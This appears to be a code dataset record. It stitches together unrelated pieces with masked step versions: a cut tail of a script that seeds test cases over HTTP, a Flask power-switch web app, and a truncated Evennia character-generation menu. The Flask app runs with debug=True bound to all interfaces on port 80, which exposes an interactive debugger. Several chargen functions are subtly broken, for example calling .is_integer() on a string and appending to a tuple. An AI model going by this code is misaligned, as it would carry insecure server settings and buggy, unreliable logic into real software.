conn.getresponse()\ndata = res.read()\n\npayload = \"{\\n \\\"TestSuite_id\\\": 1,\\n \\\"Name\\\": \\\"Create project\\\"\\n}\"\nconn.request(\"POST\", \"/api/v1/testcases\", payload, headers)\n\nres = conn.getresponse()\ndata = res.read()\n\npayload = \"{\\n \\\"TestSuite_id\\\": 1,\\n \\\"Name\\\": \\\"Create project without name\\\"\\n}\"\nconn.request(\"POST\", \"/api/v1/testcases\", payload, headers)\n\nres = conn.getresponse()\ndata = res.read()\n\npayload = \"{\\n 
\\\"TestSuite_id\\\": 1,\\n \\\"Name\\\": \\\"Check if overview contains project\\\"\\n}\"\nconn.request(\"POST\", \"/api/v1/testcases\", payload, headers)\n\nres = conn.getresponse()\ndata = res.read()\n\npayload = \"{\\n \\\"TestSuite_id\\\": 1,\\n \\\"Name\\\": \\\"Edit project\\\"\\n}\"\nconn.request(\"POST\", \"/api/v1/testcases\", payload, headers)\n\nres = conn.getresponse()\ndata = res.read()\n\n################################################\n\n###\n\npayload = \"{\\n \\\"TestSuite_id\\\": 2,\\n \\\"Name\\\": \\\"Create project\\\"\\n}\"\nconn.request(\"POST\", \"/api/v1/testcases\", payload, headers)\n\nres = conn.getresponse()\ndata = res.read()\n\npayload = \"{\\n \\\"TestSuite_id\\\": 2,\\n \\\"Name\\\": \\\"Create requirement\\\"\\n}\"\nconn.request(\"POST\", \"/api/v1/testcases\", payload, headers)\n\nres = conn.getresponse()\ndata = res.read()\n\npayload = \"{\\n \\\"TestSuite_id\\\": 2,\\n \\\"Name\\\": \\\"Create requirement without name\\\"\\n}\"\nconn.request(\"POST\", \"/api/v1/testcases\", payload, headers)\n\nres = conn.getresponse()\ndata = res.read()\n\npayload = \"{\\n \\\"TestSuite_id\\\": 2,\\n \\\"Name\\\": \\\"Overview contains requirement\\\"\\n}\"\nconn.request(\"POST\", \"/api/v1/testcases\", payload, headers)\n\nres = conn.getresponse()\ndata = res.read()\n\npayload = \"{\\n \\\"TestSuite_id\\\": 2,\\n \\\"Name\\\": \\\"Edit requirement\\\"\\n}\"\nconn.request(\"POST\", \"/api/v1/testcases\", payload, headers)\n\nres = conn.getresponse()\ndata = res.read()\n\npayload = \"{\\n \\\"TestSuite_id\\\": 2,\\n \\\"Name\\\": \\\"Cover requirement\\\"\\n}\"\nconn.request(\"POST\", \"/api/v1/testcases\", payload, headers)\n\nres = conn.getresponse()\ndata = res.read()\n\n################################################\npayload = \"{\\n \\\"Name\\\": \\\"Create and edit TestSuites and TestCase\\\"\\n}\"\nconn.request(\"POST\", \"/api/v1/testsuites\", payload, headers)\n###\n\nres = conn.getresponse()\ndata = res.read()\n\npayload = \"{\\n 
\\\"TestSuite_id\\\": 3,\\n \\\"Name\\\": \\\"Create test suite\\\"\\n}\"\nconn.request(\"POST\", \"/api/v1/testcases\", payload, headers)\n\nres = conn.getresponse()\ndata = res.read()\n\npayload = \"{\\n \\\"TestSuite_id\\\": 3,\\n \\\"Name\\\": \\\"Create test suite without name\\\"\\n}\"\nconn.request(\"POST\", \"/api/v1/testcases\", payload, headers)\n\nres = conn.getresponse()\ndata = res.read()\n\npayload = \"{\\n \\\"TestSuite_id\\\": 3,\\n \\\"Name\\\": \\\"Check if overview contains suite\\\"\\n}\"\nconn.request(\"POST\", \"/api/v1/testcases\", payload, headers)\n\nres = conn.getresponse()\ndata = res.read()\n\npayload = \"{\\n \\\"TestSuite_id\\\": 3,\\n \\\"Name\\\": \\\"Edit test suite\\\"\\n}\"\nconn.request(\"POST\", \"/api/v1/testcases\", payload, headers)\n\nres = conn.getresponse()\ndata = res.read()\n\npayload = \"{\\n \\\"TestSuite_id\\\": 3,\\n \\\"Name\\\": \\\"Create test case without details\\\"\\n}\"\nconn.request(\"POST\", \"/api/v1/testcases\", payload, headers)\n\nres = conn.getresponse()\ndata = res.read()\n\npayload = \"{\\n \\\"TestSuite_id\\\": 3,\\n \\\"Name\\\": \\\"Create test case with details\\\"\\n}\"\nconn.request(\"POST\", \"/api/v1/testcases\", payload, headers)\n\nres = conn.getresponse()\ndata = res.read()\n\npayload = \"{\\n \\\"TestSuite_id\\\": 3,\\n \\\"Name\\\": \\\"Create test case without name\\\"\\n}\"\nconn.request(\"POST\", \"/api/v1/testcases\", payload, headers)\n\nres = conn.getresponse()\ndata = res.read()\n\npayload = \"{\\n \\\"TestSuite_id\\\": 3,\\n \\\"Name\\\": \\\"Check if overview contains case\\\"\\n}\"\nconn.request(\"POST\", \"/api/v1/testcases\", payload, headers)\n\nres = conn.getresponse()\ndata = res.read()\n\npayload = \"{\\n \\\"TestSuite_id\\\": 3,\\n \\\"Name\\\": \\\"Edit test case\\\"\\n}\"\nconn.request(\"POST\", \"/api/v1/testcases\", payload, headers)\n\nres = conn.getresponse()\ndata = res.read()\n\n################################################\npayload = \"{\\n \\\"Name\\\": 
\\\"Create test set and run\\\"\\n}\"\nconn.request(\"POST\", \"/api/v1/testsuites\", payload, headers)\n###\n\nres = conn.getresponse()\ndata = res.read()\n\npayload = \"{\\n \\\"TestSuite_id\\\": 4,\\n \\\"Name\\\": \\\"Create project\\\"\\n}\"\nconn.request(\"POST\", \"/api/v1/testcases\", payload, headers)\n\nres = conn.getresponse()\ndata = res.read()\n\npayload = \"{\\n \\\"TestSuite_id\\\": 4,\\n \\\"Name\\\": \\\"Create set\\\"\\n}\"\nconn.request(\"POST\", \"/api/v1/testcases\", payload, headers)\n\nres = conn.getresponse()\ndata = res.read()\n\npayload = \"{\\n \\\"TestSuite_id\\\": 4,\\n \\\"Name\\\": \\\"Overview contains set\\\"\\n}\"\nconn.request(\"POST\", \"/api/v1/testcases\", payload, headers)\n\nres = conn.getresponse()\ndata = res.read()\n\npayload = \"{\\n \\\"TestSuite_id\\\": 4,\\n \\\"Name\\\": \\\"Create set without name\\\"\\n}\"\nconn.request(\"POST\", \"/api/v1/testcases\", payload, headers)\n\nres = conn.getresponse()\ndata = res.read()\n\npayload = \"{\\n \\\"TestSuite_id\\\": 4,\\n \\\"Name\\\": \\\"Create set without tests\\\"\\n}\"\nconn.request(\"POST\", \"/api/v1/testcases\", payload, headers)\n\nres = conn.getresponse()\ndata = res.read()\n\npayload = \"{\\n \\\"TestSuite_id\\\": 4,\\n \\\"Name\\\": \\\"Edit test set\\\"\\n}\"\nconn.request(\"POST\", \"/api/v1/testcases\", payload, headers)\n\nres = conn.getresponse()\ndata = res.read()\n\npayload = \"{\\n \\\"TestSuite_id\\\": 4,\\n \\\"Name\\\": \\\"Create test run\\\"\\n}\"\nconn.request(\"POST\", \"/api/v1/testcases\", payload, headers)\n\nres = conn.getresponse()\ndata = res.read()\n\npayload = \"{\\n \\\"TestSuite_id\\\": 4,\\n \\\"Name\\\": \\\"Overview contains run\\\"\\n}\"\nconn.request(\"POST\", \"/api/v1/testcases\", payload, headers)\n\nres = conn.getresponse()\ndata = res.read()\n\npayload = \"{\\n \\\"TestSuite_id\\\": 4,\\n \\\"Name\\\": \\\"Execute contains tests\\\"\\n}\"\nconn.request(\"POST\", \"/api/v1/testcases\", payload, headers)\n\nres = 
conn.getresponse()\ndata = res.read()\n\n\n################################################\npayload = \"{\\n \\\"Name\\\": \\\"Registration and log test\\\"\\n}\"\nconn.request(\"POST\", \"/api/v1/testsuites\", payload, headers)\n###\n\nres = conn.getresponse()\ndata = res.read()\n\npayload = \"{\\n \\\"TestSuite_id\\\": 5,\\n \\\"Name\\\": \\\"Redirect to login page\\\"\\n}\"\nconn.request(\"POST\", \"/api/v1/testcases\", payload, headers)\n\nres = conn.getresponse()\ndata = res.read()\n\npayload = \"{\\n \\\"TestSuite_id\\\": 5,\\n \\\"Name\\\": \\\"Registration\\\"\\n}\"\nconn.request(\"POST\", \"/api/v1/testcases\", payload, headers)\n\nres = conn.getresponse()\ndata = res.read()\n\npayload = \"{\\n \\\"TestSuite_id\\\": 5,\\n \\\"Name\\\": \\\"Registrate same user\\\"\\n}\"\nconn.request(\"POST\", \"/api/v1/testcases\", payload, headers)\n\nres = conn.getresponse()\ndata = res.read()\n\npayload = \"{\\n \\\"TestSuite_id\\\": 5,\\n \\\"Name\\\": \\\"Log and logout\\\"\\n}\"\nconn.request(\"POST\", \"/api/v1/testcases\", payload, headers)\n", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
<|reserved_special_token_0|> @app.route('/') def hello_world(): return render_template('index.html') <|reserved_special_token_0|> @app.route('/off/') def off(): state = powerswitch.off() return json.dumps(state) @app.route('/toggle/') def toggle(): state = powerswitch.toggle() return json.dumps(state) @app.route('/state/') def state(): state = powerswitch.state() return json.dumps(state) <|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> @app.route('/') def hello_world(): return render_template('index.html') @app.route('/on/') def on(): state = powerswitch.on() return json.dumps(state) @app.route('/off/') def off(): state = powerswitch.off() return json.dumps(state) @app.route('/toggle/') def toggle(): state = powerswitch.toggle() return json.dumps(state) @app.route('/state/') def state(): state = powerswitch.state() return json.dumps(state) if __name__ == '__main__': powerswitch.on() app.run(host='0.0.0.0', port=80, debug=True) <|reserved_special_token_1|> <|reserved_special_token_0|> app = Flask(__name__) @app.route('/') def hello_world(): return render_template('index.html') @app.route('/on/') def on(): state = powerswitch.on() return json.dumps(state) @app.route('/off/') def off(): state = powerswitch.off() return json.dumps(state) @app.route('/toggle/') def toggle(): state = powerswitch.toggle() return json.dumps(state) @app.route('/state/') def state(): state = powerswitch.state() return json.dumps(state) if __name__ == '__main__': powerswitch.on() app.run(host='0.0.0.0', port=80, debug=True) <|reserved_special_token_1|> from flask import Flask from flask import render_template from flask import make_response import json from lib import powerswitch app = Flask(__name__) @app.route('/') def hello_world(): return render_template('index.html') @app.route('/on/') def on(): state = powerswitch.on() return json.dumps(state) @app.route('/off/') def off(): state = powerswitch.off() return json.dumps(state) @app.route('/toggle/') 
def toggle(): state = powerswitch.toggle() return json.dumps(state) @app.route('/state/') def state(): state = powerswitch.state() return json.dumps(state) if __name__ == '__main__': powerswitch.on() app.run(host='0.0.0.0', port=80, debug=True) <|reserved_special_token_1|> from flask import Flask from flask import render_template from flask import make_response import json from lib import powerswitch app = Flask(__name__) @app.route('/') def hello_world(): return render_template('index.html') @app.route('/on/') def on(): state = powerswitch.on() return json.dumps(state) @app.route('/off/') def off(): state = powerswitch.off() return json.dumps(state) @app.route('/toggle/') def toggle(): state = powerswitch.toggle() return json.dumps(state) @app.route('/state/') def state(): state = powerswitch.state() return json.dumps(state) if __name__ == "__main__": powerswitch.on() app.run(host='0.0.0.0', port=80, debug=True)
flexible
{ "blob_id": "18d3f58048b7e5d792eb2494ecc62bb158ac7407", "index": 254, "step-1": "<mask token>\n\n\n@app.route('/')\ndef hello_world():\n return render_template('index.html')\n\n\n<mask token>\n\n\n@app.route('/off/')\ndef off():\n state = powerswitch.off()\n return json.dumps(state)\n\n\n@app.route('/toggle/')\ndef toggle():\n state = powerswitch.toggle()\n return json.dumps(state)\n\n\n@app.route('/state/')\ndef state():\n state = powerswitch.state()\n return json.dumps(state)\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\n@app.route('/')\ndef hello_world():\n return render_template('index.html')\n\n\n@app.route('/on/')\ndef on():\n state = powerswitch.on()\n return json.dumps(state)\n\n\n@app.route('/off/')\ndef off():\n state = powerswitch.off()\n return json.dumps(state)\n\n\n@app.route('/toggle/')\ndef toggle():\n state = powerswitch.toggle()\n return json.dumps(state)\n\n\n@app.route('/state/')\ndef state():\n state = powerswitch.state()\n return json.dumps(state)\n\n\nif __name__ == '__main__':\n powerswitch.on()\n app.run(host='0.0.0.0', port=80, debug=True)\n", "step-3": "<mask token>\napp = Flask(__name__)\n\n\n@app.route('/')\ndef hello_world():\n return render_template('index.html')\n\n\n@app.route('/on/')\ndef on():\n state = powerswitch.on()\n return json.dumps(state)\n\n\n@app.route('/off/')\ndef off():\n state = powerswitch.off()\n return json.dumps(state)\n\n\n@app.route('/toggle/')\ndef toggle():\n state = powerswitch.toggle()\n return json.dumps(state)\n\n\n@app.route('/state/')\ndef state():\n state = powerswitch.state()\n return json.dumps(state)\n\n\nif __name__ == '__main__':\n powerswitch.on()\n app.run(host='0.0.0.0', port=80, debug=True)\n", "step-4": "from flask import Flask\nfrom flask import render_template\nfrom flask import make_response\nimport json\nfrom lib import powerswitch\napp = Flask(__name__)\n\n\n@app.route('/')\ndef hello_world():\n return render_template('index.html')\n\n\n@app.route('/on/')\ndef on():\n state = 
powerswitch.on()\n return json.dumps(state)\n\n\n@app.route('/off/')\ndef off():\n state = powerswitch.off()\n return json.dumps(state)\n\n\n@app.route('/toggle/')\ndef toggle():\n state = powerswitch.toggle()\n return json.dumps(state)\n\n\n@app.route('/state/')\ndef state():\n state = powerswitch.state()\n return json.dumps(state)\n\n\nif __name__ == '__main__':\n powerswitch.on()\n app.run(host='0.0.0.0', port=80, debug=True)\n", "step-5": "from flask import Flask\nfrom flask import render_template\nfrom flask import make_response\n\nimport json\n\nfrom lib import powerswitch\n\napp = Flask(__name__)\n\n@app.route('/')\ndef hello_world():\n return render_template('index.html')\n\n@app.route('/on/')\ndef on():\n state = powerswitch.on()\n return json.dumps(state)\n\n@app.route('/off/')\ndef off():\n state = powerswitch.off()\n return json.dumps(state)\n\n@app.route('/toggle/')\ndef toggle():\n state = powerswitch.toggle()\n return json.dumps(state)\n\n@app.route('/state/')\ndef state():\n state = powerswitch.state()\n return json.dumps(state)\n\nif __name__ == \"__main__\":\n powerswitch.on()\n app.run(host='0.0.0.0', port=80, debug=True)\n", "step-ids": [ 4, 6, 7, 8, 9 ] }
[ 4, 6, 7, 8, 9 ]
from world.enums import * from world.content.species import SPECIES from world.content.chargen import * from evennia.utils.evmenu import get_input from evennia.utils.utils import list_to_string import re def start(caller): if not caller: return caller.ndb._menutree.points = { "attributes": 20, "skills": 20 } caller.ndb._menutree.character = { "home_planet": None, "full_name": None, "origin": None, "stats": {}, "age": 16, "is_psionic": False, "current_term": 0, "species": "human" } caller.ndb._menutree.terms = [] for attribute in AttributeEnum: caller.ndb._menutree.character["stats"][attribute.name] = 20 text = """ Welcome to Singularity's Character Generator! Have a paragraph about WTF is going on and some info about our game. Also here are some warnings that you *definitely* shouldn't make multiple characters. And also here's some commands to help get you more info! TBD!!! |yPlease do not make multiple characters to game chargen.|n When you're ready, go ahead and like.. type |ybegin|n to start CharGen. """ return text, ({"key": "begin", "goto": "node_menu"}) def node_menu(caller): name = caller.ndb._menutree.character["full_name"] if not name: name = "Not Set" species = caller.ndb._menutree.character["species"] origin = caller.ndb._menutree.character["origin"] if not origin: origin = "Not Set" d_b = "|gOk|n" if _is_basics_done(caller)[0] else "|rNo|n" d_a = "|gOk|n" if _is_attributes_done(caller)[0] else "|rNo|n" d_s = "|gOk|n" if _is_skills_done(caller)[0] else "|rNo|n" d_l = "|gOk|n" if _is_life_done(caller)[0] else "|rNo|n" text = """ Below are the general details of your character. Use the below commands to navigate through chargen steps. Some steps may appear after others are completed. 
|wFull Name:|n %s |wSpecies:|n %s |wOrigin:|n %s Completed: |wBasics:|n %s |wAttributes:|n %s |wStarting Skills:|n %s |wLife path:|n %s """ % (name, species, origin, d_b, d_a, d_s, d_l) options = ( {"key": "basics", "goto": "node_basics"}, {"key": "attributes", "goto": "node_attributes"}, {"key": "skills", "goto": "node_skills"} ) if _is_basics_done(caller)[0] and _is_attributes_done(caller)[0] and _is_skills_done(caller)[0]: options.append({"key": "life path", "goto": "node_terms"}) if _is_life_done(caller)[0]: options.append({"key": "finish", "goto": "node_finish"}) return text, options def node_basics(caller): character = caller.ndb._menutree.character name = character["full_name"] if not name: name = "Not Set" species = character["species"] origin = character["origin"] if not origin: origin = "Not Set" age = character["age"] text = """ |wFull Name:|n %s |wAdolescent Age:|n %s |wSpecies:|n %s |wOrigin:|n %s Type |yhelp <command>|n to get info on available choices. """ % (name, age, species, origin) options = ( {"key": "return", "goto": "node_menu"}, {"key": "full_name", "goto": _node_basics_full_name}, {"key": "age", "goto": _node_basics_age}, {"key": "species", "goto": _node_basics_species}, {"key": "origin", "goto": _node_basics_origin} ) return text, options def _node_basics_full_name(caller): def callback(caller, prompt, user_input): caller.msg("You set your character's full name to: %s." % user_input) caller.ndb._menutree.character["full_name"] = user_input get_input(caller, ">> Enter your character's full name.", callback) def _node_basics_age(caller): def callback(caller, prompt, user_input): species = next(s for s in CHARGEN["species"] if s["key"] == caller.ndb._menutree.character["species"]) if not user_input.is_integer() \ or int(user_input) < species["min_start_age"] \ or int(user_input) > species["max_start_age"]: caller.msg("Age must be a valid number between %s and %s." 
% (species["min_start_age"], species["max_start_age"])) return caller.msg("You set your character's age to: %s." % user_input) caller.ndb._menutree.character["age"] = int(user_input) get_input(caller, ">> Enter your character's age.", callback) def _node_basics_species(caller): def callback(caller, prompt, user_input): character = caller.ndb._menutree.character species = next((s for s in SPECIES if s["title"].lower().startswith(user_input.lower())), None) if not species: caller.msg("'%s' is not a valid species. Valid species: |wHuman|n, and |wAndroid.|n" % user_input) return species_chargen = next(s for s in CHARGEN["species"] if s["key"] == species["key"]) caller.msg("You set your character's species to: %s." % species["title"]) character["age"] = species_chargen["min_age"] character["origin"] = None character["species"] = species["key"] get_input(caller, ">> Enter your character's species.", callback) def _node_basics_origin(caller): def callback(caller, prompt, user_input): character = caller.ndb._menutree.character origins = filter(lambda o: character["species"] in o["species_restrictions"], CHARGEN["origins"]) origin = next((o for o in origins if o["title"].lower().startswith(user_input.lower())), None) if not origin: caller.msg("'%s' is not a valid origin choice. Valid choices: %s" % (user_input, list_to_string(map(lambda o: o["title"], origins)))) return caller.msg("You set your character's origin to: %s." % user_input) character["origin"] = origin["key"] get_input(caller, ">> Enter your character's origin.", callback) def _is_attributes_done(caller): if caller.ndb._menutree.points["attributes"] != 0: return False, "All attribute points must be allocated." return True, "" def _is_basics_done(caller): character = caller.ndb._menutree.character name = character["full_name"] if not name or len(name) < 3: return False, "Full name must have a value and be longer than 3 characters." origin = character["origin"] if not origin: return False, "Must select an origin." 
species_stats = next(s for s in CHARGEN["species"] if s["key"] == character["species"]) age = character["age"] if age < species_stats["min_start_age"]: return False, "Age must be equal to or more than %s." % species_stats["min_start_age"] if age > species_stats["max_start_age"]: return False, "Age must be equal to or less than %s." % species_stats["max_start_age"] return True, "" def _is_skills_done(caller): return False, "" def _is_life_done(caller): return False, "" def node_skills(caller): text = """ """ index = 0 stats = caller.ndb._menutree.character["stats"] for skill in SkillEnum: if index % 2 == 0: text += "\n" text += ("%s:" % skill.name).ljust(28) value = stats.get(skill.name, 0) text += str(value).rjust(9) if index % 2 == 0: text += " " index += 1 options = ( {"key": "return", "goto": "node_menu"}, {"key": "set", "goto": ""} ) return text, options def node_attributes(caller): text = "" for attribute in AttributeEnum: if attribute == AttributeEnum.Psi and not caller.ndb._menutree.character["is_psionic"]: continue text += "%s: " % attribute.name text += "%s\r\n" % caller.ndb._menutree.character["stats"][attribute.name] text += "\r\n%s points remaining.\r\n" % caller.ndb._menutree.points["attributes"] text += "\r\nType \"|yadd <number> to <attribute>|n\" to adjust an attribute positively." text += "\r\nType \"|ysub <number> from <attribute>|n\" to adjust an attribute negatively." 
# options = {"key": "_default", "goto": _node_attributes} # if caller.ndb._menutree.points["attributes"] == 0: options = ({"key": "_default", "goto": _node_attributes}, {"key": "return", "goto": "node_menu"}) return text, options def _node_attributes(caller, raw_string): match = re.match(r"add (\d+) to (\w+)", raw_string) if match: return adjust_attribute(caller, match, True) match = re.match(r"sub (\d+) from (\w+)", raw_string) if match: return adjust_attribute(caller, match, False) if not match: return "node_attributes" def node_terms(caller): text = "" term_count = 1 for term in caller.ndb._menutree.terms: text += "\r\n* Term %s:" % term_count + " %s" % term.title term_count += 1 age = caller.ndb._menutree.character["age"] + (4 * caller.ndb._menutree.character["current_term"]) text += "\r\nCurrent Character Age: %s" % age text += "\r\n\r\nType \"|ychoose <term>|n\" to begin a term." options = ({"key": "_default", "goto": _node_terms}, {"key": "list choices", "goto": _list_term_choices}, {"key": "finish", "goto": "node_finish"}) return text, options def _node_terms(caller, raw_string): match = re.match(r"choose (\w+)", raw_string) if not match: error(caller, "I didn't understand that.") return "node_terms" term_token = match.group(1).lower() term = next((x for x in TERMS if x["title"].lower().startswith(term_token)), None) if not term: error(caller, "%s is not a valid term. 
Type \"|ylist choices|n\" to get a list of all available careers.") return "node_terms" caller.ndb._menutree.terms.append({ "term": term["title"] }) return "node_term" def _list_term_choices(caller): text = "" for term in TERMS: text += "\r\n* %s" % term["title"] for assignment in term["assignments"]: text += "\r\n\t- %s: " % assignment["title"] text += "sample description text" caller.msg(text) return "node_terms" def node_term(caller): term_title = caller.ndb._menutree.terms[len(caller.ndb._menutree.terms) - 1]["term"] # term = next((x for x in TERMS if x["title"] == term_title), None) text = "Career: %s" % term_title text += "\r\nAssignment: Not Set" text += "\r\nPersonal Advancement: Not Set" text += "\r\nYears: %s" % caller.ndb._menutree.character["age"] text += "-%s" % (caller.ndb._menutree.character["age"] + 4) text += "\r\n\r\nLife Event: |y1 Available|n" text += "\r\n\r\nType \"|yset Assignment to <assignment>|n\" to choose an assignment." text += "\r\nType \"|yset Advancement to <option>|n\" to choose a personal advancement." text += "\r\n\r\nRolling for a life event is optional and may yield positive or negative results. " text += "Once you've chosen to roll a life event, the result cannot be rerolled or changed except through mulligan." options = ({"key": "show assignments", "goto": _list_term_assignments}, {"key": "show advancements", "goto": _list_term_advancements}, {"key": "roll life event", "goto": _do_life_event}) return text, options def _list_term_advancements(caller): return "node_term" def _list_term_assignments(caller): return "node_term" def _do_life_event(caller): return "node_term" def adjust_attribute(caller, match, is_add): attribute_token = match.group(2).lower() attribute = next((x for x in AttributeEnum if x.name.lower().startswith(attribute_token)), None) if not attribute: error(caller, "%s is not a valid attribute." 
% match.group(2)) return "node_attributes" value = int(match.group(1)) if not value or value < 0: error(caller, "Value to adjust must be a positive number.") return "node_attributes" attribute_value = caller.ndb._menutree.character["stats"][attribute.name] if not is_add and attribute_value - value < 10: error(caller, attribute.name + " cannot be reduced below 10.") return "node_attributes" # calculate cost.. i_value = value cost = 0 while i_value > 0: if is_add: new_value = i_value + attribute_value else: new_value = attribute_value - i_value if new_value <= 12: cost += 4 elif new_value <= 16: cost += 2 elif new_value <= 23: cost += 1 elif new_value <= 26: cost += 2 elif new_value <= 30: cost += 4 i_value -= 1 if not is_add: cost *= -1 if cost > caller.ndb._menutree.points["attributes"]: deficit = (caller.ndb._menutree.points["attributes"] - cost) * -1 error(caller, "Raising %s" % attribute.name + " costs %s total points," % cost + " %s more points than you have available." % deficit) return "node_attributes" # Succeeded the gauntlet. Change their stat. if is_add: caller.ndb._menutree.character["stats"][attribute.name] += value else: caller.ndb._menutree.character["stats"][attribute.name] -= value caller.ndb._menutree.points["attributes"] -= cost msg = "Successfully set %s " % attribute.name + "to %s" % caller.ndb._menutree.character["stats"][attribute.name] msg += " for %s points." % cost success(caller, msg) return "node_attributes" def node_finish(caller): text = "" options = () return text, options def success(caller, msg): caller.msg("|b<|cSystem|b>|n %s" % msg) def error(caller, msg): caller.msg("|y<|rError|y>|n %s" % msg)
normal
{ "blob_id": "99eeb039e1a369e450247d10ba22a1aa0b35dae9", "index": 6875, "step-1": "<mask token>\n\n\ndef start(caller):\n if not caller:\n return\n caller.ndb._menutree.points = {'attributes': 20, 'skills': 20}\n caller.ndb._menutree.character = {'home_planet': None, 'full_name':\n None, 'origin': None, 'stats': {}, 'age': 16, 'is_psionic': False,\n 'current_term': 0, 'species': 'human'}\n caller.ndb._menutree.terms = []\n for attribute in AttributeEnum:\n caller.ndb._menutree.character['stats'][attribute.name] = 20\n text = \"\"\"\n Welcome to Singularity's Character Generator!\n \n Have a paragraph about WTF is going on and some info about our game. Also here are some warnings\n that you *definitely* shouldn't make multiple characters. And also here's some commands to\n help get you more info! TBD!!!\n \n |yPlease do not make multiple characters to game chargen.|n\n \n When you're ready, go ahead and like.. type |ybegin|n to start CharGen.\n \"\"\"\n return text, {'key': 'begin', 'goto': 'node_menu'}\n\n\n<mask token>\n\n\ndef node_basics(caller):\n character = caller.ndb._menutree.character\n name = character['full_name']\n if not name:\n name = 'Not Set'\n species = character['species']\n origin = character['origin']\n if not origin:\n origin = 'Not Set'\n age = character['age']\n text = (\n \"\"\"\n |wFull Name:|n %s\n |wAdolescent Age:|n %s\n |wSpecies:|n %s\n |wOrigin:|n %s\n \n Type |yhelp <command>|n to get info on available choices.\n \"\"\"\n % (name, age, species, origin))\n options = {'key': 'return', 'goto': 'node_menu'}, {'key': 'full_name',\n 'goto': _node_basics_full_name}, {'key': 'age', 'goto':\n _node_basics_age}, {'key': 'species', 'goto': _node_basics_species}, {\n 'key': 'origin', 'goto': _node_basics_origin}\n return text, options\n\n\ndef _node_basics_full_name(caller):\n\n def callback(caller, prompt, user_input):\n caller.msg(\"You set your character's full name to: %s.\" % user_input)\n caller.ndb._menutree.character['full_name'] = 
user_input\n get_input(caller, \">> Enter your character's full name.\", callback)\n\n\ndef _node_basics_age(caller):\n\n def callback(caller, prompt, user_input):\n species = next(s for s in CHARGEN['species'] if s['key'] == caller.\n ndb._menutree.character['species'])\n if not user_input.is_integer() or int(user_input) < species[\n 'min_start_age'] or int(user_input) > species['max_start_age']:\n caller.msg('Age must be a valid number between %s and %s.' % (\n species['min_start_age'], species['max_start_age']))\n return\n caller.msg(\"You set your character's age to: %s.\" % user_input)\n caller.ndb._menutree.character['age'] = int(user_input)\n get_input(caller, \">> Enter your character's age.\", callback)\n\n\n<mask token>\n\n\ndef _is_attributes_done(caller):\n if caller.ndb._menutree.points['attributes'] != 0:\n return False, 'All attribute points must be allocated.'\n return True, ''\n\n\ndef _is_basics_done(caller):\n character = caller.ndb._menutree.character\n name = character['full_name']\n if not name or len(name) < 3:\n return (False,\n 'Full name must have a value and be longer than 3 characters.')\n origin = character['origin']\n if not origin:\n return False, 'Must select an origin.'\n species_stats = next(s for s in CHARGEN['species'] if s['key'] ==\n character['species'])\n age = character['age']\n if age < species_stats['min_start_age']:\n return False, 'Age must be equal to or more than %s.' % species_stats[\n 'min_start_age']\n if age > species_stats['max_start_age']:\n return False, 'Age must be equal to or less than %s.' 
% species_stats[\n 'max_start_age']\n return True, ''\n\n\ndef _is_skills_done(caller):\n return False, ''\n\n\ndef _is_life_done(caller):\n return False, ''\n\n\n<mask token>\n\n\ndef node_attributes(caller):\n text = ''\n for attribute in AttributeEnum:\n if (attribute == AttributeEnum.Psi and not caller.ndb._menutree.\n character['is_psionic']):\n continue\n text += '%s: ' % attribute.name\n text += '%s\\r\\n' % caller.ndb._menutree.character['stats'][attribute\n .name]\n text += '\\r\\n%s points remaining.\\r\\n' % caller.ndb._menutree.points[\n 'attributes']\n text += (\n '\\r\\nType \"|yadd <number> to <attribute>|n\" to adjust an attribute positively.'\n )\n text += (\n '\\r\\nType \"|ysub <number> from <attribute>|n\" to adjust an attribute negatively.'\n )\n options = {'key': '_default', 'goto': _node_attributes}, {'key':\n 'return', 'goto': 'node_menu'}\n return text, options\n\n\n<mask token>\n\n\ndef node_terms(caller):\n text = ''\n term_count = 1\n for term in caller.ndb._menutree.terms:\n text += '\\r\\n* Term %s:' % term_count + ' %s' % term.title\n term_count += 1\n age = caller.ndb._menutree.character['age'\n ] + 4 * caller.ndb._menutree.character['current_term']\n text += '\\r\\nCurrent Character Age: %s' % age\n text += '\\r\\n\\r\\nType \"|ychoose <term>|n\" to begin a term.'\n options = {'key': '_default', 'goto': _node_terms}, {'key':\n 'list choices', 'goto': _list_term_choices}, {'key': 'finish',\n 'goto': 'node_finish'}\n return text, options\n\n\ndef _node_terms(caller, raw_string):\n match = re.match('choose (\\\\w+)', raw_string)\n if not match:\n error(caller, \"I didn't understand that.\")\n return 'node_terms'\n term_token = match.group(1).lower()\n term = next((x for x in TERMS if x['title'].lower().startswith(\n term_token)), None)\n if not term:\n error(caller,\n '%s is not a valid term. 
Type \"|ylist choices|n\" to get a list of all available careers.'\n )\n return 'node_terms'\n caller.ndb._menutree.terms.append({'term': term['title']})\n return 'node_term'\n\n\n<mask token>\n\n\ndef node_term(caller):\n term_title = caller.ndb._menutree.terms[len(caller.ndb._menutree.terms) - 1\n ]['term']\n text = 'Career: %s' % term_title\n text += '\\r\\nAssignment: Not Set'\n text += '\\r\\nPersonal Advancement: Not Set'\n text += '\\r\\nYears: %s' % caller.ndb._menutree.character['age']\n text += '-%s' % (caller.ndb._menutree.character['age'] + 4)\n text += '\\r\\n\\r\\nLife Event: |y1 Available|n'\n text += (\n '\\r\\n\\r\\nType \"|yset Assignment to <assignment>|n\" to choose an assignment.'\n )\n text += (\n '\\r\\nType \"|yset Advancement to <option>|n\" to choose a personal advancement.'\n )\n text += (\n '\\r\\n\\r\\nRolling for a life event is optional and may yield positive or negative results. '\n )\n text += (\n \"Once you've chosen to roll a life event, the result cannot be rerolled or changed except through mulligan.\"\n )\n options = {'key': 'show assignments', 'goto': _list_term_assignments}, {\n 'key': 'show advancements', 'goto': _list_term_advancements}, {'key':\n 'roll life event', 'goto': _do_life_event}\n return text, options\n\n\n<mask token>\n\n\ndef adjust_attribute(caller, match, is_add):\n attribute_token = match.group(2).lower()\n attribute = next((x for x in AttributeEnum if x.name.lower().startswith\n (attribute_token)), None)\n if not attribute:\n error(caller, '%s is not a valid attribute.' 
